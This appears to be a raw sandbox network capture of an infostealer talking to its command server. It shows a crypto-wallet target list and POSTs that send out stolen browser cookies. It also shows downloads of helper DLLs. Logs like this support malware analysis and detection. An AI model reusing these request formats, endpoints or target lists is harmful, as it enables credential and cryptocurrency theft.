form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"plugins------FCAAEHJDBKJJKFHJEBKF--
Aug 30, 2024 00:48:00.291481018 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:00 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Aug 30, 2024 00:48:00.291528940 CEST	164	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9n
Aug 30, 2024 00:48:00.291538954 CEST	1236	IN	Data Raw: 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 78 73 5a 58 52 38 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 Data Ascii: a2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZ
Aug 30, 2024 00:48:00.291567087 CEST	224	IN	Data Raw: 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d Data Ascii: ZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRl
Aug 30, 2024 00:48:00.291580915 CEST	1236	IN	Data Raw: 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 4a 72 61 57 6c 71 61 57 35 6f 63 47 31 75 61 6d 5a 6d 59 32 39 6d 61 6d 39 75 59 6d 5a 69 5a 32 46 76 59 33 77 78 66 44 42 38 4d 48 78 48 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57 Data Ascii: bXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB
Aug 30, 2024 00:48:00.291593075 CEST	1236	IN	Data Raw: 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d 4e 71 61 32 68 6e 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d Data Ascii: YW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGl
Aug 30, 2024 00:48:00.292505980 CEST	1236	IN	Data Raw: 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 Data Ascii: ZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHx
Aug 30, 2024 00:48:00.292591095 CEST	776	IN	Data Raw: 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 39 73 5a 6d 70 72 61 57 6c 6b 59 6d 4e 6f 66 44 46 38 4d 48 77 77 66 46 42 31 62 48 4e 6c 49 46 64 68 62 47 78 6c 64 43 42 44 61 48 4a 76 62 57 6c 31 62 58 78 6a 61 57 39 71 62 32 4e 77 61 32 Data Ascii: Z2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXB
Aug 30, 2024 00:48:00.293819904 CEST	470	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI Host: 185.215.113.100 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="message"fplugins------DGHJECAFIDAFHJKFCGHI--
Aug 30, 2024 00:48:00.540582895 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:00 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Aug 30, 2024 00:48:00.558813095 CEST	203	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJECBGIJDGCAEBFIIECA Host: 185.215.113.100 Content-Length: 6535 Connection: Keep-Alive Cache-Control: no-cache
Aug 30, 2024 00:48:00.558847904 CEST	6535	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 Data Ascii: ------IJECBGIJDGCAEBFIIECAContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------IJECBGIJDGCAEBFIIECAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Aug 30, 2024 00:48:01.526921034 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:00 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 30, 2024 00:48:01.811342955 CEST	94	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 30, 2024 00:48:02.060964108 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:01 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Aug 30, 2024 00:48:02.061115026 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Aug 30, 2024 00:48:03.936532974 CEST	953	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEG Host: 185.215.113.100 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------HIEBAKEHDHCAKEBFBKEG--
Aug 30, 2024 00:48:04.968646049 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 30, 2024 00:48:05.056303978 CEST	565	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKF Host: 185.215.113.100 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file"------FCAAEHJDBKJJKFHJEBKF--
Aug 30, 2024 00:48:05.877644062 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 30, 2024 00:48:06.576720953 CEST	565	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGC Host: 185.215.113.100 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file"------BFHJECAAAFHIJKFIJEGC--
Aug 30, 2024 00:48:07.360200882 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 30, 2024 00:48:07.727479935 CEST	94	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 30, 2024 00:48:08.157994032 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:08 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Aug 30, 2024 00:48:09.150937080 CEST	94	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Aug 30, 2024 00:48:09.396548986 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 22:48:09 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 